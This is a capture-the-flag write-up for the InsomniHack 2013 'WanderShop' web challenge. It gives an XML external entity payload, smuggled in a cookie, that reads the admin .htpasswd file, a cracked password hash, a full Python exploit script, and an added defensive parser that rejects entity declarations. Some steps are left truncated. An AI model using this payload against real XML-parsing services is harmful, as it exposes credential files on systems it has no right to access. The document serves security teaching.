InsomniHack-2013/Web2/WanderShop

608 bytes added, 11:32, 26 March 2013
/* Summary */
== Summary ==
* If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this.
* Could you break into his shop and get us as many items as you can?
* '''Goal: Access the admin page'''
== Solution ==
</pre>
* We can then inject XML through the cookie. We use [https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing XML external entities], which make the parser read local files and include their contents in the parsed XML
<syntaxhighlight lang="xml">
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
<item type="5" name="asd">&item;</item>
</basket>
</syntaxhighlight>
* The parsed XML is rendered on the checkout page, so we place the content of the .htpasswd file in an item element, which is then displayed in the table.
* Here's the HTML result
<syntaxhighlight lang="html4strict">
<!DOCTYPE html>
<html lang="en">
</body>
</html>
</syntaxhighlight>
* The password hash is in CRYPT format, which is easily brute-forced with John the Ripper
<pre>
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
>slamas (admin)
</pre>
* The flag is in the admin page
 
* Complete script
<syntaxhighlight lang="python">
#!/usr/bin/env python
# Python 2 script (urllib2, print statement)

import requests, urllib2, base64

url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/'

# Basket XML declaring an external entity that points at the admin .htpasswd file
payload = '''
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
<item type="5" name="asd">&item;</item>
</basket>
'''

# The basket cookie is base64-encoded, then URL-encoded
payload = urllib2.quote(base64.encodestring(payload))

cookie = {'basket': payload}
# checkout.php parses the basket and renders the items, including the expanded entity
r = requests.get(url + 'checkout.php', cookies=cookie)
print r.content
</syntaxhighlight>
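For the defensive side of the same bug, here is an added example (not part of the original writeup or the challenge code, written in Python 3) of how a checkout page could handle the basket cookie without being exposed to XXE: it decodes the cookie the same way the script above encodes it, refuses any DOCTYPE or ENTITY declaration before the parser sees it, and only extracts the fields the shop needs. The cookie format and element names are assumed from the writeup; the sample baskets are constructed.

```python
#!/usr/bin/env python3
"""Hardened parsing of a WanderShop-style 'basket' cookie (added example)."""
import base64
import re
import urllib.parse
import xml.etree.ElementTree as ET

# The basket format needs no DTD, and the internal subset is the only place
# an external entity can be declared, so any DTD marker is grounds for rejection.
_DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)


def decode_basket_cookie(cookie_value: str) -> bytes:
    """Reverse the writeup's encoding: URL-quote of base64 of the XML."""
    return base64.b64decode(urllib.parse.unquote(cookie_value))


def parse_basket(cookie_value: str) -> list:
    """Return [(type, name, text)] for a well-formed basket, or raise ValueError."""
    raw = decode_basket_cookie(cookie_value)
    if _DTD_MARKER.search(raw):
        raise ValueError("basket cookie contains a DTD/entity declaration")
    try:
        root = ET.fromstring(raw)  # an undeclared &entity; also fails here
    except ET.ParseError as exc:
        raise ValueError(f"malformed basket: {exc}") from exc
    if root.tag != "basket":
        raise ValueError("unexpected root element")
    items = []
    for item in root.findall("item"):
        # Keep only the fields the shop needs; the item type must be numeric.
        if not item.get("type", "").isdigit():
            raise ValueError("non-numeric item type")
        items.append((int(item.get("type")), item.get("name", ""), (item.text or "").strip()))
    return items


def is_safe_basket(cookie_value: str) -> bool:
    """True if the cookie parses under the rules above, False if it is rejected."""
    try:
        parse_basket(cookie_value)
        return True
    except ValueError:
        return False


def encode_basket(xml_bytes: bytes) -> str:
    """Mirror of the writeup's encoding, used to build the constructed cookies below."""
    return urllib.parse.quote(base64.b64encode(xml_bytes))


# Constructed inputs: a benign basket and the XXE payload shown in the writeup.
BENIGN = encode_basket(b'<basket><item type="5" name="sword">1</item></basket>')
XXE = encode_basket(b'<!DOCTYPE basket [ <!ENTITY item SYSTEM "admin/.htpasswd"> ]>'
                    b'<basket><item type="5" name="asd">&item;</item></basket>')
```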
 
== See also ==
* [[InsomniHack-2013]]